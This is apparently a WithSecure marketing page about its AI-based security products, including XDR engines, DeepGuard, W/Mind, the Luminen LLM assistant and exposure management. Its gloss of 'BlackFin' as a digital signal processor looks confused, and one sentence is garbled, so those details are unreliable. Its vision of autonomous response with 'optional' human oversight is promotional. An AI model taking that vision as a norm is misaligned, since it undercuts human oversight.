Revolutionizing AI in cyber security

WithSecure has been at the forefront of artificial intelligence innovation for nearly two decades, leveraging transformative technology to provide advanced, effective, and safe cyber security solutions.

The AI journey began in 2006 with the Gemini file analysis engine: a naïve Bayesian classifier that identified unique characteristics of malware by analysing extensive datasets of malicious and clean files. Gemini set the stage for modern threat detection systems.

Building on this foundation, WithSecure began building the Sample Management Automation (SMA) system, employing heuristic reasoning through the CLIPS expert system engine. SMA was groundbreaking, automating malware identification via sandboxed environments and heuristic analysis. By keeping these advancements under wraps, WithSecure maintained a competitive edge until similar ‘next-gen’ solutions emerged years later. 

WithSecure Elements Extended Detection and Response (XDR) is a unified solution that has its roots in the success of the heuristic reasoning model invented with SMA. It was first developed as a rapid detection service in 2016 and has grown over the years, becoming a unified solution that can protect entire IT estates. It minimizes the impact of attacks by using automated and advanced preventative controls that keep incident volumes and lower-level attacks at bay.

AI-powered tooling enables fast detection, investigation, and response to threats across endpoints, identities, emails and other cloud-based collaboration services. XDR uses a large collection of point AI engines for various tasks, including: 

• Baseliner engine swarm, which identifies the clean baseline behaviour across an organization

• Noise cancelling engines, which is an on-device engine capable of handling host-unique noise, preventing false alarms on build servers 

• BlackFin anomaly detection models, which identify unusual patterns within data generated by a Blackfin processor (a type of digital signal processor) 

• PowerShell obfuscation detection, which detects whether powershell, a command-line shell and scripting language that helps automate tasks, looks obfuscated. 

AI-assisted Identity Threat Detection and Response

WithSecure’s Elements Identity Security solution is built on the XDR technology stack and therefore uses the same heuristic reasoning engine. However, because it is newer than XDR its AI lineup is still modest and developing. The solution is currently being expanded to cover cloud resources.

Modern Endpoint Protection

WithSecure uses AI for Endpoint Protection in two main ways: in DeepGuard, the on-device AI, and W/Mind, the modern reimplementation of the standardized measurement approach. 

DeepGuard employs heuristic reasoning to detect and block obviously malicious activities. This system was specifically curated to have extremely low false alarm rates, making it reliable as a first line of defence.

W/Mind is a heuristic reasoning system which analyses suspicious files and URLs, calling upon AI engines including: 

• DiAPK (Android APK file analysis)

• MalPE (malicious Windows binary analysis) 

• MalDoc (malicious document file analysis)

• and more. 

Luminen is a generative AI capability based on an LLM and natively embedded into WithSecure Elements Cloud. It offers two key functionalities to accelerate threat investigations and enhance the workflow of IT and cybersecurity teams: security event activity summary and investigation assistant.

By lowering the bar for cybersecurity expertise, Luminen enables even non-security experts to understand threats, ultimately leading to better protection for organizations. 

Security Event Activity Summary

Luminen provides concise summaries of recent security events, translated into the user’s local language. The tool automatically generates weekly summary reports, highlighting the most significant security events and suggesting actions. These reports are designed to be actionable, with built-in event drill-downs for verifying source data. This feature is especially beneficial for less experienced team members, as it simplifies complex information. 

Investigation Assistant

Luminen also offers actionable recommendations and guidance for addressing detected threats. This feature delves deeper into BCDs, providing natural-language explanations and empowering teams to focus on critical tasks. 

WithSecure’s Exposure Management (XM) solution is also built on the heuristic reasoning engine, but with a twist. Instead of using the reasoning capabilities to detects attacks from events happening in the environment, the XM AI uses reasoning to identify the vulnerabilities, misconfigurations, and other resources an attacker could exploit. We then use this knowledge to build simulations and identify the worst-case threats an environment could face from a real attacker. 

The result? Organizations gain a clear understanding of their most critical risks and can prioritize mitigation accordingly. 

Generative AI (GenAI) represents just one facet of WithSecure’s approach. While many companies rely on large language models (LLMs) indiscriminately, WithSecure advocates for a smarter, more energy-efficient mix of algorithms. Here’s how WithSecure envisions the future:

• Specialized Algorithms: Smaller, task-focused models collaborating seamlessly. 

• AI with Agency: Autonomous systems capable of detecting and responding to incidents and recommendations without human intervention.

• Human-AI Partnership: Transitioning from human-aided AI to AI-aided humans, eventually making AI-driven responses safe and reliable enough for optional human oversight. 

Centring European values

WithSecure is deeply committed to aligning technology with EU regulations like the upcoming AI Code of Practice. WithSecure views compliance not as a hurdle but as a strategic advantage, ensuring transparency, safety, and privacy in its AI systems. 

AI’s integration into cyber security brings transformative benefits, significantly enhancing the efficiency and effectiveness of security teams. By automating repetitive tasks, processing vast amounts of data, and improving threat detection accuracy, AI enables experts to focus on more strategic challenges and innovation.

For example, WithSecure’s Identity Security service was designed to protect the modern IT environment, particularly Entra ID (Microsoft’s integrated cloud identity and access solution). As more organizations rely on Entra ID, cybercriminals have increasingly the fact that traditional EDR tools fail to provide the necessary visibility into identity-based attacks, leaving enterprises vulnerable. 

To address this, the Identity Security service has been specifically developed over two years to monitor and secure Entra ID. AI plays a crucial role in its functionality by analysing user behaviours, normalizing activity patterns, and identifying anomalies indicative of potential threats. By correlating these insights with suspicious sign-ins, AI helps reduce false positives, ensuring that security teams focus only on genuine threats rather than being overwhelmed by routine deviations.

At WithSecure, the development of AI models is an ongoing process of innovation and refinement, driven by the need to combat the ever-evolving landscape of cyber threats. Here's how we approach it:

1. Understanding New Threats 

Every new AI model begins with human analysis. Our experts study emerging threats in detail to gain a deep understanding of their behaviour and characteristics. This foundational knowledge is then used to design automated systems capable of handling the sheer volume of cyber threats.

2. Data-Centric Development 

While the algorithms themselves are often straightforward, the quality and relevance of data are paramount. We focus on:

• Ensuring the correct data is collected. 
• Filtering out noise and irrelevant information.
• Extracting meaningful features from the data to make it actionable. Avoiding the “Garbage In, Garbage Out” (GIGO) pitfall—poor data leads to ineffective models.

3. Continuous Improvement 

Our AI engines are not static. Old models are retired as better ones are developed. This iterative process ensures our solutions remain effective against modern threats, providing robust and reliable protection.

By combining expert analysis, high-quality data, and iterative refinement, WithSecure builds AI systems that can adapt to and outpace the ever-changing cyber threat landscape. As AI continues to evolve, so too will WithSecure’s suite of solutions. Future advancements will focus on refining AI models to profile different identity types in the cloud, enabling more precise detection and higher fidelity alerts. Additionally, industry-leading recommendations will be integrated, leveraging insights from past incidents and the company’s comprehensive security portfolio. With these continuous improvements, AI-driven cybersecurity will remain at the forefront of defending against ever-evolving digital threats. 

Ready to learn more?

Learn how WithSecure's cutting-edge AI solutions can transform your cybersecurity strategy. Visit our offering page to explore our full range of services and see how we can help you stay one step ahead of emerging threats.